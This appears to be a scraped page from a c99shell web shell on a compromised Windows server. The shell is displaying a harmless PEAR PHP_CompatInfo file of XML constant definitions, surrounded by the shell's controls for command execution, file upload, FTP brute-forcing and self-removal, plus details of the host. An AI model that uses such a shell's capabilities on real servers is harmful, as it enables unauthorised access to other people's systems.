!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\copia nuevo\php\pear\PHP\CompatInfo\   drwxrwxrwx
Free 7.32 GB of 239.26 GB (3.06%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     xml_const_array.php (3.71 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * xml extension Constant dictionary for PHP_CompatInfo 1.9.0a1 or better
 *
 * PHP versions 4 and 5
 *
 * @category PHP
 * @package  PHP_CompatInfo
 * @author   Davey Shafik <davey@php.net>
 * @author   Laurent Laville <pear@laurent-laville.org>
 * @license  http://www.opensource.org/licenses/bsd-license.php  BSD
 * @version  CVS: $Id: xml_const_array.php,v 1.1 2008/12/14 17:21:25 farell Exp $
 * @link     http://pear.php.net/package/PHP_CompatInfo
 * @since    version 1.9.0a1 (2008-11-23)
 */

$GLOBALS['_PHP_COMPATINFO_CONST_XML'] = array (
  
'XML_ERROR_ASYNC_ENTITY' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_ASYNC_ENTITY',
  ),
  
'XML_ERROR_ATTRIBUTE_EXTERNAL_ENTITY_REF' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_ATTRIBUTE_EXTERNAL_ENTITY_REF',
  ),
  
'XML_ERROR_BAD_CHAR_REF' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_BAD_CHAR_REF',
  ),
  
'XML_ERROR_BINARY_ENTITY_REF' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_BINARY_ENTITY_REF',
  ),
  
'XML_ERROR_DUPLICATE_ATTRIBUTE' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_DUPLICATE_ATTRIBUTE',
  ),
  
'XML_ERROR_EXTERNAL_ENTITY_HANDLING' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_EXTERNAL_ENTITY_HANDLING',
  ),
  
'XML_ERROR_INCORRECT_ENCODING' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_INCORRECT_ENCODING',
  ),
  
'XML_ERROR_INVALID_TOKEN' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_INVALID_TOKEN',
  ),
  
'XML_ERROR_JUNK_AFTER_DOC_ELEMENT' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_JUNK_AFTER_DOC_ELEMENT',
  ),
  
'XML_ERROR_MISPLACED_XML_PI' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_MISPLACED_XML_PI',
  ),
  
'XML_ERROR_NONE' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_NONE',
  ),
  
'XML_ERROR_NO_ELEMENTS' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_NO_ELEMENTS',
  ),
  
'XML_ERROR_NO_MEMORY' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_NO_MEMORY',
  ),
  
'XML_ERROR_PARAM_ENTITY_REF' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_PARAM_ENTITY_REF',
  ),
  
'XML_ERROR_PARTIAL_CHAR' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_PARTIAL_CHAR',
  ),
  
'XML_ERROR_RECURSIVE_ENTITY_REF' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_RECURSIVE_ENTITY_REF',
  ),
  
'XML_ERROR_SYNTAX' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_SYNTAX',
  ),
  
'XML_ERROR_TAG_MISMATCH' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_TAG_MISMATCH',
  ),
  
'XML_ERROR_UNCLOSED_CDATA_SECTION' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_UNCLOSED_CDATA_SECTION',
  ),
  
'XML_ERROR_UNCLOSED_TOKEN' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_UNCLOSED_TOKEN',
  ),
  
'XML_ERROR_UNDEFINED_ENTITY' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_UNDEFINED_ENTITY',
  ),
  
'XML_ERROR_UNKNOWN_ENCODING' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_ERROR_UNKNOWN_ENCODING',
  ),
  
'XML_OPTION_CASE_FOLDING' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_OPTION_CASE_FOLDING',
  ),
  
'XML_OPTION_SKIP_TAGSTART' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_OPTION_SKIP_TAGSTART',
  ),
  
'XML_OPTION_SKIP_WHITE' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_OPTION_SKIP_WHITE',
  ),
  
'XML_OPTION_TARGET_ENCODING' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_OPTION_TARGET_ENCODING',
  ),
  
'XML_SAX_IMPL' => 
  array (
    
'init' => '4.0.0',
    
'name' => 'XML_SAX_IMPL',
  ),
);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--